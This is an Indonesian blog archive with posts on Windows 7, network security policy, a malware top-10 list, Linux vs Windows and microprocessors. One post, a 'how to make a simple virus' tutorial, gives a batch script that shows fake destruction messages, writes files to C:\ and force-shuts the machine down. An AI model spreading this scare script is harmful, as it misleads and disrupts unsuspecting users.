Minggu, 14 Februari 2010

windows 7


Fitur Windows 7 Dapat Mendeteksi Baterai Rusak

Beberapa user Windows 7 menyampaikan keluhan sistem operasi tersebut mengganggu kinerja baterai laptop. Pihak Microsoft pun melakukan investigasi dan telah mengumumkan hasilnya.

Perusahaan yang bermarkas di Redmond, Amerika Serikat ini mengklaim Windows 7 sama sekali tidak menjebol baterai. Jika baterai laptop ditengarai rusak oleh sistem, memang demikian faktanya.

"Dalam setiap kasus yang kami identifikasi, baterai laptop bersangkutan memang perlu diganti," klaim Steven Sinofsky, Microsoft President of Windows.

Baterai laptop memang pada dasarnya sudah bermasalah dan tidak ada kaitannya dengan Windows 7.

Peringatan mengenai kondisi baterai laptop adalah salah satu fitur baru yang disematkan di Windows 7. Jika baterai terdeteksi bermasalah, sistem akan memberi peringatan pada pengguna.

Fitur ini tidak ada di Windows edisi sebelumnya. Menurut Sinofsky, user Windows Vista atau XP kemungkinan tidak tahu baterai mereka sudah aus dan baru menerima peringatan setelah upgrade ke Windows 7.


Rabu, 10 Februari 2010

sistem keamanan jaringan

Merancang Sistem Keamanan Jaringan yang Tangguh
Suatu organisasi dapat mempunyai dua atau lebih dari satu situs atau dimana tiap situs mempunyai jaringan sendiri. Bila organisasi besar, maka sangat dimungkinkan situs-situs tersebut mempunyai administrasi jaringan yang dibedakan menurut tujuan tertentu.

Bila situs-situs ini tidak terhubung melalui internet, tiap situs mungkin memiliki kebijakan keamanan sendiri. Bagaimanapun, bila situs-situs tersebut terhubung melalui internet, maka kebijakan keamanan harus mencakup tujuan dari semua situs yang saling terhubung.

Pada umumnya suatu situs adalah bagian dari organisasi yang mempunyai beberapa komputer dan sumber daya yang terhubung ke dalam suatu jaringan. Sumber daya tersebut misalnya :

- Workstation dan Laptop
- Komputer sebagai host atau server
- Interkoneksi: gateway, router, bridge, repeater
- Perangkat lunak aplikasi dan jaringan (NOS)
- Kabel-kabel jaringan
- Informasi di dalam file dan database

Kebijakan keamanan situs harus memperhatikan pula keamanan terhadap sumber daya tersebut. Karena situs terhubung ke jaringan lain, maka kebijakan keamanan harus memperhatikan kebutuhan dari semua jaringan yang saling terhubung. Hal ini penting untuk diperhatikan karena kemungkinan kebijakan keamanan situs dapat melindungi situs tersebut, namun berbahaya bagi sumber daya jaringan yang lain.

Suatu contoh dari hal ini adalah penggunaan alamat IP di belakang firewall, dimana alamat IP tersebut sudah digunakan oleh orang lain. Pada kasus ini, penyusupan dapat dilakukan terhadap jaringan di belakang firewall dengan melakukan IP spoofing. Sebagai catatan, RFC 1244 membahas keamanan keamanan situs secara detail.

Kebijakan Keamanan Jaringan

Kebijakan keamanan menyediakan kerangka-kerangka untuk membuat keputusan yang spesifik, misalnya mekanisme apa yang akan digunakan untuk melindungi jaringan dan bagaimana mengkonfigurasi servis-servis. Kebijakan keamanan juga merupakan dasar untuk mengembangkan petunjuk pemrograman yang aman untuk diikuti user maupun bagi administrator sistem. Karena kebjikan keamanan tersebut mencakup bahasan yang sangat luas, maka pada saat ini hanya akan dibahas inti permasalahan saja dan tidak akan membahas hal-hal yang bersifat spesifik dari segi teknologi.

Sebuah kebijakan keamanan mencakup hal-hal berikut ini:

1. Deskripsi secara detail tentang lingkungan teknis dari situs, hukum yang berlaku, otoritas dari kebijakan tersebut dan filosofi dasar untuk digunakan pada saat menginterpretasikan kebijakan tersebut.
2. Analisa risiko yang mengidentifikasi aset-aset situs, ancaman yang dihadapi oleh aset-aset tersebut dan biaya yang harus dikeluarkan untuk kerusakan/kehilangan aset-aset tersebut.
3. Petunjuk bagi administrator sistem untuk mengelola sistem
4. Definisi bagi user tentang hal-hal yang boleh dilakukan
5. Petunjuk untuk kompromi terhadap media dan penerapan hukum yang ada, serta memutuskan apakah akan melacak penyusup atau akan mematikan sistem dan kemudian memulihkannya lagi.

Faktor yang berpengaruh terhadap keberhasilan kebijakan keamanan antara lain adalah:
- Komitmen dari pengelola jaringan
- Dukungan teknologi untuk menerapkan kebijakan keamanan tersebut
- Keefektifan penyebaran kebijakan tersebut
- Kesadaran semua user jaringan terhadap keamanan jaringan

Pihak pengelola jaringan komputer mengatur tanggung jawab terhadap keamanan jaringan, menyediakan training untuk personel-personel yang bertugas di bidang keamanan jaringan dan mengalokasikan dana untuk keamanan jaringan. Yang termasuk pilihan-pilihan teknis yang dapat digunakan untuk mendukung keamanan jaringan komputer antara lain:

- Authentikasi terhadap sistem
- Audit sistem untuk akuntabilitas dan rekonstruksi
- Enkripsi terhadap sistem untuk penyimpanan dan pengiriman data penting
- Tool-tool jaringan, misalnya firewall dan proxy

Hal-hal Praktis Pendukung

Di bawah ini adalah hal-hal praktis yang perlu dilakukan untuk mendukung keamanan jaringan komputer, antara lain:

- Memastikan semua account mempunyai password yang sulit untuk ditebak. Akan lebih baik bila menggunakan OTP (One Time Password)
- Menggunakan tool, misalnya MD5 checksums, sebuah teknik kriptografi untuk memastikan integritas perangkat lunak sistem
- Menggunakan teknik pemrograman yang aman pada saat membuat perangkat lunak
- Selalu bersikap waspada terhadap penggunaan dan konfigurasi jaringan komputer
- Memeriksa secara rutin apakah vendor memiliki perbaikan-perbaikan terhadap lubang - keamanan yang terbaru dan selalu menjaga sistem selalu mengalami upgrading terhadap keamanan
- Memeriksa secara rutin dokumen-dokumen dan artikel on-line tentang bahaya keamanan dan teknik mengatasiny. Dokumen dan artikel seperti ini dapat ditemukan pada situs-situs milik incident response teams, misalnya CERT (Computer Emergency Response Team – http://www.cert.org dan Computer Security Incident Response Team - http://www.CSIRT.org)
- Mengaudit sistem dan jaringan dan secara rutin memeriksa daftar log. Beberapa situs yang mengalami insiden keamanan melaporkan bahwa audit yang dikumpulkan minim sehingga sulit untuk mendeteksi dan melacak penyusupan


malware


10 Malware Paling Ganas di Awal 2010
Pergantian tahun bukan berarti penguasa ranah malware (program jahat) di Indonesia ikut berganti. Kido masih menjadi malware terbanyak yang beredar di Indonesia pada awal 2010 ini. Diikuti dengan Win31.Generic di posisi kedua.

Demikian hasil riset Kaspersky Lab yang digelar untuk periode 21 Januari 2010 – 28 Januari 2010. Daftar malware ini dihitung berdasarkan jumlah serangan kepada koleksi server Kaspersky yang berjumlah lebih dari 7.000 unit.

Berikut adalah daftar 10 besarnya:

1. Net-Worm.Win32.Kido.ih 24.7525%
2. HEUR:Trojan.Win32.Generic 14.3564%
3. Packed.Win32.Krap.ag 6.4356%
4. Virus.Win32.Sality.aa 3.9604%
5. Trojan-Downloader.Win32.FraudLoad.wxse 2.9703%
6. Trojan.Win32.Agent.delo 2.9703%
7. Backdoor.Win32.Bifrose.cbrp 2.4752%
8. Backdoor.Win32.Hupigon.jrpd 2.4752%
9. not-a-virus:AdWare.Win32.Agent.lmz 2.4752%
10. Backdoor.Win32.IRCBot.niz 1.9802%




Linux Vs Windows

Windows vs Linux,,,,kedua-duanya mempunyai kelebihan dan kekurangan sendiri-sendiri,,,,,,,,,,,,saya akan memberi sedikit keterangan kelebihan dan kekurangan linux n windows,,,,,,,,

1. Kelebihan dan Kekurangan Linux

• Kelebihan Linux
 Sangat cocok untuk orang yang ingin mengetahui lebih dalam kerja suatu system operasi.
 Sangat cocok untuk melakukan proses hacking karena tersedia banayk tool yang canggih
 System operasi open source setiap orang bebas memodifikasi asalakan di cantumkan kode sumber
 Harganya murah karena cukup menggati biaya CDnya
 Komunitas yang sangat banyak

• Kekurangan Linux
 Linux system operasi opensource sehingga terkadang sangking sangat system opensourcenya menyulitkan orang untuk belajar, khususnya untuk pemula
 Dukungan vendor tidak sebanyak windows
 Terlalu banyak distro yang membuat bingung para konsumen
 Untuk mengaktifkan komponen tertentu kadang harus kompine kernel
 Tampilannya frafisnya lumayan berat jika menggunakan animasi seperti mac
 Tidak ada dukungan online yang menjamin Linux


2. Kelebihan dan Kekurangan Windows
o Kelebihan Windows
 Sangat user friendly
 Banyak penyedia support
 Banyak dukungan dari vendor vendor besa


o Kekurangan Windows
 System tidak bisa di modifikasi kecuali pihak Microsoft yang turun tangan
 Terhadap virus cukup mengenaskan alias gampang diserang virus dan variannya
 Kurang stabil untuk di jadikan server
 Untuk menambah aplikasi harus membayar software lisensi lagi
 Sedikitnya komunitas
 Harganya tidak terjangkau





Selasa, 02 Februari 2010

Mikroprosesor

Ada 5 karakteristik mikro prosesor

Berikut adalah karakteristik penting dari mikroprosesor :

1. Ukuran bus data internal (internal data bus size): Jumlah saluran yang terdapat dalam mikroprosesor yang menyatakan jumlah bit yang dapat ditransfer antar komponen di dalam mikroprosesor.

2. Ukuran bus data eksternal (external data bus size): Jumlah saluran yang digunakan untuk transfer data antar komponen antara mikroprosesor dan komponen-komponen di luar mikroprosesor.

3. Ukuran alamat memori (memory address size): Jumlah alamat memori yang dapat dialamati oleh mikroprosesor secara langsung.

4. Kecepatan clock (clock speed): Rate atau kecepatan clock untuk menuntun kerja mikroprosesor.

5. Fitur-fitur spesial (special features): Fitur khusus untuk mendukung aplikasi tertentu seperti fasilitas pemrosesan floating point, multimedia dan sebagainya.



Mikroprosesor

1971: 4004 Mikroprosesor

Pada tahun 1971 munculah microprocessor pertama Intel , Mikroprosesor 4004 ini digunakan pada mesin kalkulator Busicom. Dengan penemuan ini maka terbukalah jalan untuk memasukkan kecerdasan buatan pada benda mati.

1972: 8008 Mikroprosesor

Pada tahun 1972 munculah microprocessor 8008 yang berkekuatan 2 kali lipat dari pendahulunya yaitu 4004.

1974: 8080 Mikroprosesor

Menjadi otak dari sebuah komputer yang bernama Altair, pada saat itu terjual sekitar sepuluh ribu dalam 1 bulan

1978: 8086-8088 Mikroprosesor

Sebuah penjualan penting dalam divisi komputer terjadi pada produk untuk komputer pribadi buatan IBM yang memakai prosesor 8088 yang berhasil mendongkrak nama intel.

1982: 286 Mikroprosesor

Intel 286 atau yang lebih dikenal dengan nama 80286 adalah sebuah processor yang pertama kali dapat mengenali dan menggunakan software yang digunakan untuk processor sebelumnya.

1985: Intel386™ Mikroprosesor

Intel 386 adalah sebuah prosesor yang memiliki 275.000 transistor yang tertanam diprosessor tersebut yang jika dibandingkan dengan 4004 memiliki 100 kali lipat lebih banyak dibandingkan dengan 4004

1989: Intel486™ DX CPU Mikroprosesor

Processor yang pertama kali memudahkan berbagai aplikasi yang tadinya harus mengetikkan command-command menjadi hanya sebuah klik saja, dan mempunyai fungsi komplek matematika sehingga memperkecil beban kerja pada processor.

1993: Intel® Pentium® Processor
Processor generasi baru yang mampu menangani berbagai jenis data seperti suara, bunyi, tulisan tangan, dan foto.

1995: Intel® Pentium® Pro Processor

Processor yang dirancang untuk digunakan pada aplikasi server dan workstation, yang dibuat untuk memproses data secara cepat, processor ini mempunyai 5,5 jt transistor yang tertanam.

1997: Intel® Pentium® II Processor

Processor Pentium II merupakan processor yang menggabungkan Intel MMX yang dirancang secara khusus untuk mengolah data video, audio, dan grafik secara efisien. Terdapat 7.5 juta transistor terintegrasi di dalamnya sehingga dengan processor ini pengguna PC dapat mengolah berbagai data dan menggunakan internet dengan lebih baik.

1998: Intel® Pentium II Xeon® Processor

Processor yang dibuat untuk kebutuhan pada aplikasi server. Intel saat itu ingin memenuhi strateginya yang ingin memberikan sebuah processor unik untuk sebuah pasar tertentu.

1999: Intel® Celeron® Processor

Processor Intel Celeron merupakan processor yang dikeluarkan sebagai processor yang ditujukan untuk pengguna yang tidak terlalu membutuhkan kinerja processor yang lebih cepat bagi pengguna yang ingin membangun sebuah system computer dengan budget (harga) yang tidak terlalu besar. Processor Intel Celeron ini memiliki bentuk dan formfactor yang sama dengan processor Intel jenis Pentium, tetapi hanya dengan instruksi-instruksi yang lebih sedikit, L2 cache-nya lebih kecil, kecepatan (clock speed) yang lebih lambat, dan harga yang lebih murah daripada processor Intel jenis Pentium. Dengan keluarnya processor Celeron ini maka Intel kembali memberikan sebuah processor untuk sebuah pasaran tertentu.

1999: Intel® Pentium® III Processor

Processor Pentium III merupakan processor yang diberi tambahan 70 instruksi baru yang secara dramatis memperkaya kemampuan pencitraan tingkat tinggi, tiga dimensi, audio streaming, dan aplikasi-aplikasi video serta pengenalan suara.

1999: Intel® Pentium® III Xeon® Processor

Intel kembali merambah pasaran server dan workstation dengan mengeluarkan seri Xeon tetapi jenis Pentium III yang mempunyai 70 perintah SIMD. Keunggulan processor ini adalah ia dapat mempercepat pengolahan informasi dari system bus ke processor , yang juga mendongkrak performa secara signifikan. Processor ini juga dirancang untuk dipadukan dengan processor lain yang sejenis.

2000: Intel® Pentium® 4 Processor

Processor Pentium IV merupakan produk Intel yang kecepatan prosesnya mampu menembus kecepatan hingga 3.06 GHz. Pertama kali keluar processor ini berkecepatan 1.5GHz dengan formafactor pin 423, setelah itu intel merubah formfactor processor Intel Pentium 4 menjadi pin 478 yang dimulai dari processor Intel Pentium 4 berkecepatan 1.3 GHz sampai yang terbaru yang saat ini mampu menembus kecepatannya hingga 3.4 GHz.

2001: Intel® Xeon® Processor

Processor Intel Pentium 4 Xeon merupakan processor Intel Pentium 4 yang ditujukan khusus untuk berperan sebagai computer server. Processor ini memiliki jumlah pin lebih banyak dari processor Intel Pentium 4 serta dengan memory L2 cache yang lebih besar pula.

2001: Intel® Itanium® Processor

Itanium adalah processor pertama berbasis 64 bit yang ditujukan bagi pemakain pada server dan workstation serta pemakai tertentu. Processor ini sudah dibuat dengan struktur yang benar-benar berbeda dari sebelumnya yang didasarkan pada desain dan teknologi Intel’s Explicitly Parallel Instruction Computing ( EPIC ).

2002: Intel® Itanium® 2 Processor

Itanium 2 adalah generasi kedua dari keluarga Itanium

2003: Intel® Pentium® M Processor

Chipset 855, dan Intel® PRO/WIRELESS 2100 adalah komponen dari Intel® Centrino™. Intel Centrino dibuat untuk memenuhi kebutuhan pasar akan keberadaan sebuah komputer yang mudah dibawa kemana-mana.


2004: Intel Pentium M 735/745/755 processors

Dilengkapi dengan chipset 855 dengan fitur baru 2Mb L2 Cache 400MHz system bus dan kecocokan dengan soket processor dengan seri-seri Pentium M sebelumnya.

2004: Intel E7520/E7320 Chipsets

7320/7520 dapat digunakan untuk dual processor dengan konfigurasi 800MHz FSB, DDR2 400 memory, and PCI Express peripheral interfaces.

2005: Intel Pentium 4 Extreme Edition 3.73GHz

Sebuah processor yang ditujukan untuk pasar pengguna komputer yang menginginkan sesuatu yang lebih dari komputernya, processor ini menggunakan konfigurasi 3.73GHz frequency, 1.066GHz FSB, EM64T, 2MB L2 cache, dan HyperThreading.

2005: Intel Pentium D 820/830/840

Processor berbasis 64 bit dan disebut dual core karena menggunakan 2 buah inti, dengan konfigurasi 1MB L2 cache pada tiap core, 800MHz FSB, dan bisa beroperasi pada frekuensi 2.8GHz, 3.0GHz, dan 3.2GHz. Pada processor jenis ini juga disertakan dukungan HyperThreading.

2006: Intel Core 2 Quad Q6600

Processor untuk type desktop dan digunakan pada orang yang ingin kekuatan lebih dari komputer yang ia miliki memiliki 2 buah core dengan konfigurasi 2.4GHz dengan 8MB L2 cache (sampai dengan 4MB yang dapat diakses tiap core ), 1.06GHz Front-side bus, dan thermal design power ( TDP )

2006: Intel Quad-core Xeon X3210/X3220

Processor yang digunakan untuk tipe server dan memiliki 2 buah core dengan masing-masing memiliki konfigurasi 2.13 dan 2.4GHz, berturut-turut , dengan 8MB L2 cache ( dapat mencapai 4MB yang diakses untuk tiap core ), 1.06GHz Front-side bus, dan thermal design power (TDP)
mikroprosesor
data bus

Bus (hubungan antara dan di dalam
CPU, memori, dan peripheral) digunakan untuk membawa data. Lain
sambungan adalah bus alamat dan sinyal kendali.

Lebar dan kecepatan clock bus data menentukan data
rate (jumlah byte per detik itu dapat membawa), yang merupakan
salah satu faktor utama yang menentukan kekuatan pengolahan
komputer. Kebanyakan desain prosesor saat ini menggunakan 32-bit bus,
berarti bahwa data 32 bit dapat ditransfer sekaligus. Beberapa
Prosesor memiliki bus data internal yang lebih luas daripada mereka
bus eksternal untuk membuat koneksi eksternal lebih murah
sementara tetap mempertahankan beberapa manfaat dalam kekuatan pengolahan
bus yang lebih luas.

Jalur internal di seluruh data yang ditransfer ke dan dari prosesor atau ke dan dari memori. Lihat
1.bus lokal,
2. bus sistem dan
3.bus perifer.

1.bus lokal

Juga disebut "sistem bus," itu adalah jalur antara CPU, memori dan perangkat periferal. Pada awal 1990-an, ketika kecepatan tinggi VL-bus dan bus PCI diperkenalkan, mereka disebut bus lokal, karena mereka berlari pada saat itu kecepatan arus bus lokal. Sejak itu, bus-bus lokal telah jauh melampaui kecepatan VL-bus dan PCI. Lihat bus dan bus data PC.

Bisnis Lokal
Peripheral controller plug ke slot kartu pada bus lokal.


Bus Speed Perbandingan

Jenis bus tingkat Total Lebar Speed
ISA 16 bits 8 MHz 16MB/sec
EISA 32 bits 8 MHz 32MB/sec
VL-bus 32 bits 25 MHz 100MB/sec
VL-bus 32 bits 33 MHz 132MB/sec
PCI 32 bits 33 MHz 132MB/sec
PCI 64 bits 33 MHz 264MB/sec



2.bus sistem

(1) jalur utama antara CPU dan memori. Kecepatan berasal dari jumlah saluran paralel (16 bit, 32 bit, dll) dan clock speed. Juga dikenal sebagai "frontside bus," ini lebih cepat daripada bus perifer (PCI, ISA, dll), tetapi lebih lambat dari bagian belakang bus. Lihat perifer bus, belakang bus dan Northbridge.

(2) jalur utama antara CPU dan peripheral. Lihat perifer bus.

3.perifer bus

Juga dikenal sebagai "input / output bus" atau "I / O bus," itu adalah jalur data yang menghubungkan perangkat periferal ke CPU. PCI dan USB bus yang umum digunakan pada PC. ISA, EISA, VL-bus, dan Micro Channel Bus digunakan di PC sebelumnya. Kontras dengan bus sistem.

Cara Mudah Membuat Virus Sederhana

Hoi hoy, mari mari yuk, saatnya berposting ria., hehehheheh..., jadi tidak ada salahnya jika berbagi ilmu dengan kamu yang sekirannya pengen tahu gimana sih cara bikin virus yang baik itu, tapi riwayatnya, virus itu kan tidak ada yang baik, dan mahal pisan obatnya, tapi jangan salah, kalo kamu susah cari obatnya, ada obat ada virus, jadi virus dulu baru obat.. yuk belajar!!







ikuti langkah langkah berikut ini
1. buka NOTEPAD
2. kalo udah copas kode dibawah ini ke notepad

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”


3.kata yang bertuliskan tebal bisa kamu ganti sesukamu
4. kemudian save dengan format .bat dan save type all file
5. selamat menikmati virus kamu

TOOLS CLEANWIPE SYMANTEC ENDPOINT PROTECTION

Tools CleanWipe Symantec Endpoint Protection V 14.3.MP1 Alat Penghapusan Cleanwipe Symantec memungkinkan penghapusan komponen produk Symante...